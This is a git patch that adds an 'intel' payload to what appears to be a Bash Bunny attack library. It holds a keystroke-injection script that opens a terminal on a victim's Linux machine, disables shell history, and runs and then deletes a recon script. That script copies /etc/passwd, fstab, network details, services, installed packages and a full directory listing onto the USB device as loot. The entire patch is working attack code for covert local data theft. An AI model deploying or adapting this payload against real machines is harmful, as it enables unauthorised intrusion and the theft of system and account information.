From 54a1f45ae2d538e1ec6c1e7b5ee8cc2665d54e10 Mon Sep 17 00:00:00 2001
From: drapl0n tuxed0 <87269662+drapl0n@users.noreply.github.com>
Date: Tue, 8 Mar 2022 22:06:57 +0530
Subject: [PATCH] uploading payload intel

---
 payloads/library/exfiltration/intel/intel.sh  | 67 +++++++++++++++++++
 .../library/exfiltration/intel/payload.txt    | 56 ++++++++++++++++
 2 files changed, 123 insertions(+)
 create mode 100644 payloads/library/exfiltration/intel/intel.sh
 create mode 100644 payloads/library/exfiltration/intel/payload.txt

diff --git a/payloads/library/exfiltration/intel/intel.sh b/payloads/library/exfiltration/intel/intel.sh
new file mode 100644
index 00000000..a3cec365
--- /dev/null
+++ b/payloads/library/exfiltration/intel/intel.sh
@@ -0,0 +1,67 @@
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+echo -e "*******************************************" >> $mntt/loot/intel
+echo "Network Schema:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel
+nmap -sV localhost >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel 
+echo "Network Interfaces:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+ifconfig >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+ip addr >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+iwconfig >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel 
+echo Storage Info: >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+findmnt >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+cat /etc/fstab >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel 
+echo "USB Info:" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel
+lsusb -v >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel 
+echo "PCI Info:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+lspci -vvv >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel 
+echo "CPU Info:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+lscpu >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel 
+echo "Systemd services:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+systemctl list-units >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel 
+echo User/groups: >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+id >> $mntt/loot/intel 
+echo -e "\n" >> $mntt/loot/intel 
+cat /etc/passwd >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "*******************************************" >> $mntt/loot/intel 
+echo "Installed packages:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm -qa >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+snap list >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+flatpak list --app >> $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "******************************************" >> $mntt/loot/intel 
+echo "Directory Structure:" >> $mntt/loot/intel
+echo -e "*******************************************" >> $mntt/loot/intel
+find * / >>  $mntt/loot/intel
+echo -e "\n" >> $mntt/loot/intel 
+echo -e "******************************************" >> $mntt/loot/intel 
diff --git a/payloads/library/exfiltration/intel/payload.txt b/payloads/library/exfiltration/intel/payload.txt
new file mode 100644
index 00000000..17965860
--- /dev/null
+++ b/payloads/library/exfiltration/intel/payload.txt
@@ -0,0 +1,56 @@
+# Title: intel
+# Description: intel(intelligence) payload collects detailed information of victims machine.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: GNU/Linux operating systems.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/intel.sh
+Q ENTER
+Q STRING /tmp/./intel.sh
+Q ENTER
+Q DELAY 25000
+Q STRING rm /tmp/intel.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER 
+LED FINISH